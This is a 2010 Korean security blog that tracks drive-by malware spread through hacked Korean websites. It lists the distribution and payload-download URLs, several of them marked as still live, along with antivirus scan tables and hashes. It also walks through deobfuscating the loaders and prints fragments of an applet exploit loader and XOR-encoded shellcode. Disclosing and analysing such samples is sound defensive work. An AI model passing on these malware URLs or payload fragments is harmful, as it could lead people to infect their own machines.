posted by Kwan's 2010. 5. 13. 18:36

내가 발견한 시각은 오늘 아침 9시경이었다. 예전에도 유포했다 월요일에 없어졌던 서버였지만 오늘 다시 보니 time out 위장되어 있는 사이트였다. 프루나라는 메인 페이지에서는 이 링크를 볼수없다. 여담이지만 이렇게 프루나에 꼭꼭 숨겨놓아서 어떤 사용자를 감염 시킨다는지 이해가 가지 않았다.
사진과 같이 프루나 메인페이지에서는 젼혀 search_list3.asp 가 보이지 않으므로 정상 접속에는 이상이 없다.


이 접속 경로는 http://vxd.prxxa.com/search/search_list3.asp 이쪽으로 되어있으며 이것 또한 익스플로러로 접속시 time out 이라는 문구만 보일뿐 세부 코드는 보이지 않는다!
하지만 도구를 통해서 본다면 세부 코드가 나오는 것으로 볼수있다.
이것 또한 처음에는 제대로 변환 할수 없다 .. 이사이트에 소스중 window.document.write(x); ~> window.alert(x); 로 바꾼다면 제대로 디코더가 된 코드를 볼수있다. 이 코드를 변환한다면 비로서 최종파일이 보인다.
디코더 결과 이 프루나 search_list3.asp는 
최종파일 :  http://file.ygfamily.com/php/i./c.exe0  연결 되는것을 볼수있다.
그동안 코드와는 달리 ygfamily 로 연결이 되고 있었다.
현재 이 악성코드들은 전부 V3 에서 잡을수 있으며 모두 업데이트가 완료가 되었다.
또한 악성코드들은 이스트 소프트 와 안철수연구소로 신고하였다.


정리를 하자면
http://vod.pxxna.com/search/search_list3.asp0 에서 유포중이며
최종파일 : http://file.xxfamily.com/php/i./c.exe0 받는다.

[안철수연구소]
1 search_list3.0sp ~> V3 : JS/Downloader(추가 : 2010.05.13.03)
2 c.exe ~> V3 : Win-Trojan/Injector.53248.Z(추가 : 2010.05.12.00)

[이스트 소프트] = 알약
오늘 DB 에서 업데이트!

검사 파일: search_list3.0sp 전송 시각: 2010.05.13 00:12:59 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 -
AhnLab-V3 2010.05.13.00 2010.05.12 -
AntiVir 8.2.1.242 2010.05.12 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.05.12 -
Authentium 5.2.0.5 2010.05.13 -
Avast 4.8.1351.0 2010.05.12 JS:Downloader-QJ
Avast5 5.0.332.0 2010.05.12 JS:Downloader-QJ
AVG 9.0.0.787 2010.05.13 Script/Exploit
BitDefender 7.2 2010.05.13 -
CAT-QuickHeal 10.00 2010.05.12 -
ClamAV 0.96.0.3-git 2010.05.12 -
Comodo 4829 2010.05.12 -
DrWeb 5.0.2.03300 2010.05.13 -
eSafe 7.0.17.0 2010.05.11 -
eTrust-Vet None 2010.05.12 -
F-Prot 4.5.1.85 2010.05.12 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.05.13 -
Fortinet 4.1.133.0 2010.05.12 -
GData 21 2010.05.13 JS:Downloader-QJ
Ikarus T3.1.1.84.0 2010.05.12 -
Jiangmin 13.0.900 2010.05.12 -
Kaspersky 7.0.0.125 2010.05.13 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.05.13 -
McAfee-GW-Edition 2010.1 2010.05.13 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5703 2010.05.12 -
NOD32 5110 2010.05.12 -
Norman 6.04.12 2010.05.12 -
nProtect 2010-05-12.01 2010.05.12 -
Panda 10.0.2.7 2010.05.12 -
PCTools 7.0.3.5 2010.05.12 -
Rising 22.47.02.04 2010.05.12 Trojan.DL.Script.JS.Agent.qx
Sophos 4.53.0 2010.05.13 -
Sunbelt 6296 2010.05.13 -
Symantec 20101.1.0.89 2010.05.13 -
TheHacker 6.5.2.0.279 2010.05.11 -
TrendMicro 9.120.0.1004 2010.05.12 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.13 -
VBA32 3.12.12.4 2010.05.12 -
ViRobot 2010.5.12.2312 2010.05.12 -
VirusBuster 5.0.27.0 2010.05.12 -
 
추가 정보
File size: 5777 bytes
MD5   : a485b05d5035a168bb7fc3fd38220500
SHA1  : 3685084e053db302445caae2bfd63762ebf3b97b
SHA256: 58c9bbeb8f83242d054b71c3863fe87aba222142409d3b6f5f19e3705ca67bc4
검사 파일: c.0xe 전송 시각: 2010.05.13 00:13:04 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.10 Trojan.Peed!IK
AhnLab-V3 2010.05.13.00 2010.05.12 Win-Trojan/Injector.53248.Z
AntiVir 8.2.1.242 2010.05.12 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.12 Trojan/Win32.Pincav.gen
Authentium 5.2.0.5 2010.05.13 -
Avast 4.8.1351.0 2010.05.12 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.12 Win32:Malware-gen
AVG 9.0.0.787 2010.05.13 -
BitDefender 7.2 2010.05.13 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.12 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.12 -
Comodo 4829 2010.05.12 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.13 -
eSafe 7.0.17.0 2010.05.11 -
eTrust-Vet 35.2.7484 2010.05.12 -
F-Prot 4.5.1.85 2010.05.12 -
F-Secure 9.0.15370.0 2010.05.13 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.12 -
GData 21 2010.05.13 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.12 Trojan.Peed
Jiangmin 13.0.900 2010.05.12 -
Kaspersky 7.0.0.125 2010.05.13 Trojan.Win32.Pincav.zrz
McAfee 5.400.0.1158 2010.05.13 Generic.dx!sra
McAfee-GW-Edition 2010.1 2010.05.13 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.12 Trojan:Win32/Malagent
NOD32 5110 2010.05.12 a variant of Win32/Kryptik.DXI
Norman 6.04.12 2010.05.12 -
nProtect 2010-05-12.01 2010.05.12 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.12 Generic Trojan
PCTools 7.0.3.5 2010.05.12 -
Prevx 3.0 2010.05.13 High Risk Cloaked Malware
Rising 22.47.02.04 2010.05.12 Packer.Win32.UnkPacker.b
Sophos 4.53.0 2010.05.13 Sus/UnkPack-C
Sunbelt 6296 2010.05.13 Trojan.Win32.Generic!BT
Symantec 20101.1.0.89 2010.05.13 -
TheHacker 6.5.2.0.279 2010.05.11 Trojan/Pincav.zrz
TrendMicro 9.120.0.1004 2010.05.12 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.13 -
VBA32 3.12.12.4 2010.05.12 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.12.2312 2010.05.12 -
VirusBuster 5.0.27.0 2010.05.12 -
 
추가 정보
File size: 53248 bytes
MD5   : 7dc283909f9af5493de63aae1453a807
SHA1  : 0b9d820a6563bce957c04f60545b467c1d029d3f
SHA256: c3c7dc6df3a5b802d71834046b6f87e655bb29cf9030f879f8375c9e65363e7e

댓글을 달아 주세요

posted by Kwan's 2010. 5. 12. 18:20
3주전 발견했던 CJ 엔터 테인먼트가 현재 까지도 악성코드를 가지고 있어서 이렇게 글을 올린다.
프로그램으로 본 결과 악성 코드인 lib.asp 를 삽입되어 있는 모습을 이와 같이 볼수있다.



JS 파일 안에 lib.asp 라는 파일을 확인을 할 수가 있을것이다. 이것은 역시 익스플로러로 들어갈시에 time out 이라는 문구를 보내며 위장하고 있는 사실을 볼 수 가 있다.
이 파일을 다시 복호화 과청을 걸친다면 최종 파일인 exe 가 볼수있다.
이글을 쓰는 지금 이시각도 유포중에 있으며 이 사이트를 매우 조심해야 할 필요가있다.

현재 최종파일도 받는 서버가 살아 있으므로 이 곳을 매우 조심해야한다.

lib.asp : http://61.100.7.171/cxx/lib.asp0
최종파일 : http://61.100.1.93/cxx/isa.exe0

현재도 다운을 받을 수 있으며 마지막으로 이 사이트에 대해서는 조심하자!

검사 파일: lib.asp 전송 시각: 2010.05.10 00:38:59 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.09 Virus.JS.Downloader.QJ!IK
AhnLab-V3 2010.05.09.00 2010.05.08 JS/Downloader
AntiVir 8.2.1.236 2010.05.09 JS/Drop.A.5851
Antiy-AVL 2.0.3.7 2010.05.07 -
Authentium 5.2.0.5 2010.05.09 -
Avast 4.8.1351.0 2010.05.09 JS:Downloader-QJ
Avast5 5.0.332.0 2010.05.09 JS:Downloader-QJ
AVG 9.0.0.787 2010.05.09 Script/Exploit
BitDefender 7.2 2010.05.10 Trojan.Script.407264
CAT-QuickHeal 10.00 2010.05.08 -
ClamAV 0.96.0.3-git 2010.05.09 -
Comodo 4800 2010.05.09 -
DrWeb 5.0.2.03300 2010.05.10 -
eSafe 7.0.17.0 2010.05.09 -
eTrust-Vet None 2010.05.07 -
F-Prot 4.5.1.85 2010.05.09 JS/Crypted.GA.gen
F-Secure 9.0.15370.0 2010.05.10 Trojan.Script.407264
Fortinet 4.1.133.0 2010.05.09 -
GData 21 2010.05.10 Trojan.Script.407264
Ikarus T3.1.1.84.0 2010.05.09 Virus.JS.Downloader.QJ
Jiangmin 13.0.900 2010.05.09 -
Kaspersky 7.0.0.125 2010.05.09 Trojan-Downloader.JS.Agent.fhk
McAfee 5.400.0.1158 2010.05.09 -
McAfee-GW-Edition 2010.1 2010.05.09 Heuristic.BehavesLike.JS.Exploit.A
Microsoft 1.5703 2010.05.09 -
NOD32 5099 2010.05.10 -
Norman 6.04.12 2010.05.09 -
nProtect 2010-05-09.01 2010.05.09 Trojan.Script.407264
Panda 10.0.2.7 2010.05.09 -
PCTools 7.0.3.5 2010.05.07 -
Prevx 3.0 2010.05.10 -
Rising 22.46.06.04 2010.05.09 Trojan.DL.Script.JS.Agent.qx
Sophos 4.53.0 2010.05.09 JS/Agent-MZX
Sunbelt 6283 2010.05.10 -
Symantec 20091.2.0.41 2010.05.10 -
TheHacker 6.5.2.0.277 2010.05.09 -
TrendMicro 9.120.0.1004 2010.05.09 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.10 -
VBA32 3.12.12.4 2010.05.06 -
ViRobot 2010.5.8.2306 2010.05.09 JS.S.Agent.5851
VirusBuster 5.0.27.0 2010.05.09 -
 
추가 정보
File size: 5851 bytes
MD5   : 51e7b5fe2fa7ef45de3b3671ba91b011
SHA1  : e6e7dd63b6de5b8b24c5a91d001d23a01de8186b
SHA256: 1d373a0cd0b239795370655695fb7db3138ab1aa1a4cb4df676f72150d82a7b9
검사 파일: isa.exe 전송 시각: 2010.05.10 00:46:48 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.09 Trojan.Peed!IK
AhnLab-V3 2010.05.09.00 2010.05.08 Win-Trojan/Pincav.54784.U
AntiVir 8.2.1.236 2010.05.09 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.07 Trojan/Win32.Pincav.gen
Authentium 5.2.0.5 2010.05.09 -
Avast 4.8.1351.0 2010.05.09 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.09 Win32:Malware-gen
AVG 9.0.0.787 2010.05.09 Generic17.BKEJ
BitDefender 7.2 2010.05.10 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.08 Trojan.Pincav.ywu
ClamAV 0.96.0.3-git 2010.05.09 -
Comodo 4800 2010.05.09 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.10 Trojan.Siggen1.24430
eSafe 7.0.17.0 2010.05.09 Win32.PWS.Mmorpg
eTrust-Vet 35.2.7474 2010.05.07 -
F-Prot 4.5.1.85 2010.05.09 -
F-Secure 9.0.15370.0 2010.05.10 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.09 W32/Pincav.YWU!tr
GData 21 2010.05.10 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.10 Trojan.Peed
Jiangmin 13.0.900 2010.05.09 Trojan/Pincav.eta
Kaspersky 7.0.0.125 2010.05.09 Trojan.Win32.Pincav.ywu
McAfee 5.400.0.1158 2010.05.09 PWS-Mmorpg!oq
McAfee-GW-Edition 2010.1 2010.05.09 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.09 Trojan:Win32/Malagent
NOD32 5099 2010.05.10 Win32/PSW.Gamania.NCP
Norman 6.04.12 2010.05.09 -
nProtect 2010-05-09.01 2010.05.09 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.09 Generic Trojan
PCTools 7.0.3.5 2010.05.07 -
Prevx 3.0 2010.05.10 High Risk Cloaked Malware
Rising 22.46.06.04 2010.05.09 Trojan.Win32.Generic.5202C6D7
Sophos 4.53.0 2010.05.09 Troj/Dload-HL
Sunbelt 6283 2010.05.10 Trojan.Win32.Generic!BT
Symantec 20091.2.0.41 2010.05.10 -
TheHacker 6.5.2.0.277 2010.05.10 Trojan/Pincav.ywu
TrendMicro 9.120.0.1004 2010.05.09 TSPY_MAGANIA.KI
TrendMicro-HouseCall 9.120.0.1004 2010.05.10 TSPY_MAGANIA.KI
VBA32 3.12.12.4 2010.05.06 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.8.2306 2010.05.09 Trojan.Win32.Pincav.54784.C
VirusBuster 5.0.27.0 2010.05.09 Trojan.PWS.Gamania.BBV
 
추가 정보
File size: 54784 bytes
MD5...: a19b540af7132a86e866be1152256f07
SHA1..: 77715cc29b8911598f5f43bb0b17687267ea75f5
SHA256: 1d109b0ebfebc3d3c960bb7e4ef2917d64c4fef515ab031f1f15d522f0aa7fde

box.exe ~> V3 : Win-Trojan/Magania.53248.AA(추가 : 2010.05.07.07)
isa.exe ~> V3 : Win-Trojan/Pincav.54784.U(추가 : 2010.05.01.00)

이와 같이 현재는 대부분의 신고로 모두 백신이 잡는다는 것을 볼수있다.
이런 사이트는 안전한 상태가 아니면 피하는것이 좋다고 볼수있다.
호기심에 실행시켜서 얻는 불이익은 모두 실행시킨분의 책임입니다.


댓글을 달아 주세요

posted by Kwan's 2010. 5. 11. 22:29

우연히 구글링을 하던중 www.rendom.mx/bst/ 를 발견하였다.
이사이트는 익스플로릿을 배포하는것으로 알려져있다.
멀질라로 통해 처음에 봤을때는 코드형태가 매우 이상했다.

 var wR39n2OWQBsOq7 ='';

wR39n2OWQBsOq7 = 'so un ds25so un ds30so un ds41so un ds76so un ds61so u\
n ds72so un ds25so un ds32so un ds30so un ds59so un ds\

이런식으로 계속 반복이 되는 코드를 보았다.
난 바로 도움을 청했다. 이런것을 볼때는 어떻게 보아야하는지 물어보았다. 첨에는 멀질라로의 한계같았지만 약간의 설정만 변경하면 최종파일까지 보일수 있다는걸 알았다.

처음 멀질라 설정값은
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)

이런식으로 되어있다 하지만 이렇게 본다면 나와같이 이게 뭐니 하고 의문을 가질것이다. 하지만 User Agent 를 통하여 설정을
Mozilla/7.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.2)  Gecko/20010726 Netscape/7.0

이쪽으로 설정을 변경한다면

 <applet code="sklif.Hieeyfc.class" archive="j1_893d.jar" width="480" height="200">
 <param name="data" VALUE="
http://www.rendom.mx/bst/load.php?spl=javal">
 <param name="cc" value="1">
 </applet>

이런식으로 최종파일을 쉽게 찾을수 있다. 결론적으로 멀질라의 간단한 특성을 이해하고 있다면 쉽게 찾을수 있다는 것이었다.
이걸 찾기까지 많은 시간을 내주신 바이쭌님과 처리님께 마지막으로 감사를 드립니다!ㅎ

검사 파일: load.php 전송 시각: 2010.05.11 04:24:06 (UTC)

 a-squared 4.5.0.50
2010.05.10 Packed.Win32.Krap!IK

AhnLab-V3 2010.05.11.00
2010.05.10 Packed/Win32.Krap

AntiVir 8.2.1.236
2010.05.10 TR/Crypt.XPACK.Gen

 Antiy-AVL 2.0.3.7
2010.05.10 Packed/Win32.Krap.gen

Avast 4.8.1351.0
2010.05.10 Win32:Trojan-gen

Avast5 5.0.332.0
2010.05.10 Win32:Trojan-gen

AVG 9.0.0.787
2010.05.11 Generic17.BUNU

BitDefender   7.2
2010.05.11 Backdoor.Bot.121242

Comodo 4821
2010.05.11 TrojWare.Win32.Trojan.Agent.Gen

F-Secure 9.0.15370.0
2010.05.11 Backdoor.Bot.121242

GData 21
2010.05.11 Backdoor.Bot.121242

Ikarus T3.1.1.84.0
2010.05.11 Packed.Win32.Krap

Kaspersky 7.0.0.125
2010.05.11 Packed.Win32.Krap.gx

McAfee-GW-Edition
2010.1 2010.05.10 Artemis!7B7D3BC35365

Microsoft 1.5703
2010.05.11 PWS:Win32/Zbot.gen!Y

NOD32 5103
2010.05.10 a variant of Win32/Kryptik.EBW

nProtect 2010-05-10.01
2010.05.10 Backdoor.Bot.121242

Panda 10.0.2.7
2010.05.10 Suspicious file

Sophos 4.53.0
2010.05.11 Mal/Zbot-U

Sunbelt 6289
2010.05.11 Trojan.Win32.Generic!BT

TrendMicro 9.120.0.1004
2010.05.11 TSPY_QAKBOT.SMG

TrendMicro-HouseCall 9.120.0.1004
2010.05.11 TSPY_QAKBOT.SMG

 마지막으로 모든 샘플은 안철수연구소 , 이스트소프트

전송합니다!

댓글을 달아 주세요

posted by Kwan's 2010. 5. 11. 22:25

주전자 닷컴 사이트 플레시 게임란에 어제 악성코드 유포하는것을 보았다.
플레시 게임을 시작 버튼에 숨겨져 있는것으로 현재는 유포하는지 모르겠다.
그 페이지 안에는 http://211.234.118.207/main.html 이라는것이 숨겨져있다 물론 악성코드이다.
일반 익스플로러로 켠다면 절대 보이지 않을것이다. main.html 을 자세히 열어보면
<SCRIPT LANGUAGE="JavaScript"> <!-- Hide 라는 표시 때문에 일반 익스플로러는 내부를 보지 못한다.


이 그림에서와 같이 main.html은

</SCRIPT>
<script src="rl.jpg"></script>
<script src="yt1.jpg"></script>
<script src="ytl.jpg"></script>

이것의 공유지임을 알수있다. 이 3파일중 하나는 분명 최종파일 exe 를 유포할껄 직감을 했다. 좀더 나는 안쪽으로 들어가서
rl.jpg ~ ytl.jpg 까지 살펴보았다. 처음에는 rl.jpg 에서 유포하는것으로 알고있었지만 코드가 해석 되지 못했다. 그러므로 패쓰하고
yt1.jpg로 넘어갔다.
yt1.jpg를 살펴보니 !!

try
 {
   new ActiveXObject("kYTx");
 }
 catch (e)
 {
   var YTMTV="%ud5db%uc9c9%u87cd%u9292%uc8d7%udad3%ud2da%udcd0%ud4d3%u93dc%ud8d3%udbdb%uded4%ud8d4%uc9d3%ude93%u93d2%ucfd6%uc992%uced8%u93c9%uc5d8%uBDd8%uBD";
   var YTavp123="%u58yutianayt58%u58yutianayt58%u10yutianaytEB%u4Byutianayt5B%uC9yutianayt33%uB9yutianayt66%u03yutianaytB8%u34yutianayt80%uBDyutianayt0B%uFAE2%u05yutianaytEB%uEByutianaytE8%uFFyutianaytFF";
   var YTavp1=(YTavp123.r-place(/yutianayt/g,""));
 }

이런 코드를 볼수있다. 여기서 나는 약간의 도움을 청했다. 막막했기 때문이다. 네이트온으로 도움을 부탁 드린 후 다시 코드 해석을 해보았다.
잡다한 코드 빼놓고는 중요코드는

var YTMTV="%ud5db%uc9c9%u87cd%u9292%uc8d7%udad3%ud2da%udcd0%ud4d3%u93dc%ud8d3%udbdb%uded4%ud8d4%uc9d3%ude93%u93d2%ucfd6%uc992%uced8%u93c9%uc5d8%uBDd8%uBD 이것이었다.

Hex 를 하니 이런 값이 보였다.

dbd5c9c9cd879292d7c8d3dadad2d0dcd3d4dc93d3d8dbdbd4ded4d8d3c993ded293d6cf92c9d8cec993d8c5d8BDBD 

이코드는 어디서 많이 봤던거 같다. 예전에 유포됐던 파일의 값 과 매우 유사하다!
이값을 다시 paste as hex 로 붙여 검색을 해보니 역시 xor 값은bd 였다.

이 그림과 같이 최종파일이 나오는걸 볼수있다.
처음에는 많이 당황했었지만 한번더 생각해보고 푼다면 쉽게 풀릴수있던것이다!

댓글을 달아 주세요

  1. 121312214121 2013.06.28 18:37  Addr  Edit/Del  Reply

    http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=http%3A%2F%2Fwww.zuzunza.com%2Ffg%2Fimg%2Fgreen%2Fmid_top_btn01_on.gif&client=googlechrome&hl=ko
    구글 에서 주전자닷컴 진단했더니 이렇게 떳다네여

posted by Kwan's 2010. 5. 11. 22:22

1. 사이트

한국 E 스포츠 협회 : http://www.e-sports.or.kr
대명 리조트 :
http://www.daemyungresort.com/asp/main.asp
프루나 :
http://www.pruna.com
CJ 엔터테인먼트 :
http://www.cjent.co.kr
KBS :
http://sso.kbs.co.kr
조아라 : http://www.joara.com/main.html

주전자 닷컴 :
http://zuzunza.joins.com

2. 유포 사이트

1. 한국 E 스포츠 협회
http://211.218.126.144/css/top.asp ~> 서버 죽음! (V3 : JS/Downloader 추가 : 2010.04.23.02)
http://61.100.7.171/css/lib.asp ~> 서버 죽음!  (V3 : JS/Downloader 추가 : 2010.04.23.02)

 2. 대명 리조트
http://61.100.7.171/css/lib.asp ~> 서버 죽음!
(V3 : JS/Downloader 추가 : 2010.04.23.02)

3. 프루나
http://ac.gemmir.com/t/time.js ~> 서버 죽음!
http://ac.gemmir.com/t/time.asp ~> 서버 죽음!(V3 : JS/Agent 추가 : 2010.04.19.02)

4. CJ 엔터테인먼트
http://61.100.7.171/css/lib.asp ~> 서버 죽음! (V3 : JS/Downloader 추가 : 2010.04.23.02)

5. KBS
http://202.133.245.100/exam.asp ~> 서버 죽음! (V3 : 분석중)

6. 조아라
http://www.gamejil.com/data/css.htm ~> 서버 살아있음! (V3 : 분석중)

7. 주전자 닷컴
http://211.234.118.207/main.html ~> 서버 살아있음 (V3 : 분석중)
http://211.234.118.207/rl.jpg ~> 서버 살아있음 (V3 : 분석중)
http://211.234.118.207/ytl.jpg ~> 서버 살아있음 (V3 : 분석중)
http://211.234.118.207/yt1.jpg ~> 서버 살아있음 (V3 : 분석중)

최종파일 :
top.asp , lib.asp : http://61.100.1.93/css/isa.exe ~> 서버 살아있음 !
(
V3 : Win-Trojan/Pincav.54784.U(추가 : 2010.05.01.00)

time.asp :
http://www.robot114.com/cafe/help/box.exe ~> 서버 죽음 !  (V3 : Win-Trojan/Magania.53248.AA(추가 : 2010.05.07.07)

exam.asp : http://211.76.154.8/vipasp/logo/57.exe ~> 서버 살아있음 !   (V3 : Win-Trojan/Pincav.53248.AZ 추가 : 2010.05.09.00)

css.htm : http://www.gamejil.com/data/data.exe ~> 서버 살아있음 !
                                                          (V3 : 분석중) : XOR 변형이 필요합니다!

main.html ~> yt1.jpg  http://junggomania.nefficient.co.kr/test.exe ~> 서버 살아있음 ! (V3 : 분석중) 

[바이러스 토탈] 

검사 파일: isa.exe 전송 시각: 2010.05.10 00:46:48 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.09 Trojan.Peed!IK
AhnLab-V3 2010.05.09.00 2010.05.08 Win-Trojan/Pincav.54784.U
AntiVir 8.2.1.236 2010.05.09 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.07 Trojan/Win32.Pincav.gen
Authentium 5.2.0.5 2010.05.09 -
Avast 4.8.1351.0 2010.05.09 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.09 Win32:Malware-gen
AVG 9.0.0.787 2010.05.09 Generic17.BKEJ
BitDefender 7.2 2010.05.10 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.08 Trojan.Pincav.ywu
ClamAV 0.96.0.3-git 2010.05.09 -
Comodo 4800 2010.05.09 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.10 Trojan.Siggen1.24430
eSafe 7.0.17.0 2010.05.09 Win32.PWS.Mmorpg
eTrust-Vet 35.2.7474 2010.05.07 -
F-Prot 4.5.1.85 2010.05.09 -
F-Secure 9.0.15370.0 2010.05.10 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.09 W32/Pincav.YWU!tr
GData 21 2010.05.10 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.10 Trojan.Peed
Jiangmin 13.0.900 2010.05.09 Trojan/Pincav.eta
Kaspersky 7.0.0.125 2010.05.09 Trojan.Win32.Pincav.ywu
McAfee 5.400.0.1158 2010.05.09 PWS-Mmorpg!oq
McAfee-GW-Edition 2010.1 2010.05.09 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.09 Trojan:Win32/Malagent
NOD32 5099 2010.05.10 Win32/PSW.Gamania.NCP
Norman 6.04.12 2010.05.09 -
nProtect 2010-05-09.01 2010.05.09 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.09 Generic Trojan
PCTools 7.0.3.5 2010.05.07 -
Prevx 3.0 2010.05.10 High Risk Cloaked Malware
Rising 22.46.06.04 2010.05.09 Trojan.Win32.Generic.5202C6D7
Sophos 4.53.0 2010.05.09 Troj/Dload-HL
Sunbelt 6283 2010.05.10 Trojan.Win32.Generic!BT
Symantec 20091.2.0.41 2010.05.10 -
TheHacker 6.5.2.0.277 2010.05.10 Trojan/Pincav.ywu
TrendMicro 9.120.0.1004 2010.05.09 TSPY_MAGANIA.KI
TrendMicro-HouseCall 9.120.0.1004 2010.05.10 TSPY_MAGANIA.KI
VBA32 3.12.12.4 2010.05.06 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.8.2306 2010.05.09 Trojan.Win32.Pincav.54784.C
VirusBuster 5.0.27.0 2010.05.09 Trojan.PWS.Gamania.BBV
 
추가 정보
File size: 54784 bytes
MD5...: a19b540af7132a86e866be1152256f07
SHA1..: 77715cc29b8911598f5f43bb0b17687267ea75f5
SHA256: 1d109b0ebfebc3d3c960bb7e4ef2917d64c4fef515ab031f1f15d522f0aa7fde
검사 파일: box.exe 전송 시각: 2010.05.10 00:46:56 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.09 Trojan.Win32.Pincav!IK
AhnLab-V3 2010.05.09.00 2010.05.08 Win-Trojan/Magania.53248.AA
AntiVir 8.2.1.236 2010.05.09 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.07 -
Authentium 5.2.0.5 2010.05.09 -
Avast 4.8.1351.0 2010.05.09 Win32:Rootkit-gen
Avast5 5.0.332.0 2010.05.09 Win32:Rootkit-gen
AVG 9.0.0.787 2010.05.09 -
BitDefender 7.2 2010.05.10 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.08 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.09 -
Comodo 4800 2010.05.09 TrojWare.Win32.Trojan.Agent.Gen
DrWeb 5.0.2.03300 2010.05.10 Trojan.Siggen1.28028
eSafe 7.0.17.0 2010.05.09 -
eTrust-Vet 35.2.7474 2010.05.07 -
F-Prot 4.5.1.85 2010.05.09 -
F-Secure 9.0.15370.0 2010.05.10 Trojan.Peed.Gen
Fortinet 4.1.133.0 2010.05.09 -
GData 21 2010.05.10 Trojan.Peed.Gen
Ikarus T3.1.1.84.0 2010.05.10 Trojan.Win32.Pincav
Jiangmin 13.0.900 2010.05.09 Trojan/Pincav.ewu
Kaspersky 7.0.0.125 2010.05.09 Trojan.Win32.Pincav.zor
McAfee 5.400.0.1158 2010.05.09 PWS-Mmorpg!pa
McAfee-GW-Edition 2010.1 2010.05.09 Heuristic.LooksLike.Heuristic.BehavesLike.Win32.Downloader.B
Microsoft 1.5703 2010.05.09 Trojan:Win32/Malagent
NOD32 5099 2010.05.10 a variant of Win32/Kryptik.DXI
Norman 6.04.12 2010.05.09 -
nProtect 2010-05-09.01 2010.05.09 Trojan.Peed.Gen
Panda 10.0.2.7 2010.05.09 Trj/CI.A
PCTools 7.0.3.5 2010.05.07 -
Prevx 3.0 2010.05.10 High Risk Cloaked Malware
Rising 22.46.06.04 2010.05.09 Trojan.Win32.Generic.5203053E
Sophos 4.53.0 2010.05.09 Sus/UnkPack-C
Sunbelt 6283 2010.05.10 Trojan.Win32.Generic!BT
Symantec 20091.2.0.41 2010.05.10 -
TheHacker 6.5.2.0.277 2010.05.10 Trojan/Kryptik.dxi
TrendMicro 9.120.0.1004 2010.05.09 PAK_Generic.001
TrendMicro-HouseCall 9.120.0.1004 2010.05.10 -
VBA32 3.12.12.4 2010.05.06 Malware-Dropper.Win32.Inject.gen
ViRobot 2010.5.8.2306 2010.05.09 Trojan.Win32.Pincav.53248.U
VirusBuster 5.0.27.0 2010.05.09 -
 
추가 정보
File size: 53248 bytes
MD5...: ef0a929469019e21809bf2b3ca1a9be8
SHA1..: 6581aa9311056612a1a42de323e8b1d0478b4a96
SHA256: ad8a92588c3b10d0191cc8c6b1a7a979c9927f872756a6c5e2e39286741e80fd
검사 파일: 57.exe 전송 시각: 2010.05.10 00:47:04 (UTC)
안티바이러스 엔진 버전 정의 날짜 검사 결과
a-squared 4.5.0.50 2010.05.09 Trojan.Peed!IK
AhnLab-V3 2010.05.09.00 2010.05.08 Win-Trojan/Pincav.53248.AZ
AntiVir 8.2.1.236 2010.05.09 TR/Crypt.ZPACK.Gen
Antiy-AVL 2.0.3.7 2010.05.07 -
Authentium 5.2.0.5 2010.05.09 -
Avast 4.8.1351.0 2010.05.09 Win32:Malware-gen
Avast5 5.0.332.0 2010.05.09 Win32:Malware-gen
AVG 9.0.0.787 2010.05.09 Generic17.BVCK
BitDefender 7.2 2010.05.10 Trojan.Peed.Gen
CAT-QuickHeal 10.00 2010.05.08 (Suspicious) - DNAScan
ClamAV 0.96.0.3-git 2010.05.09 -
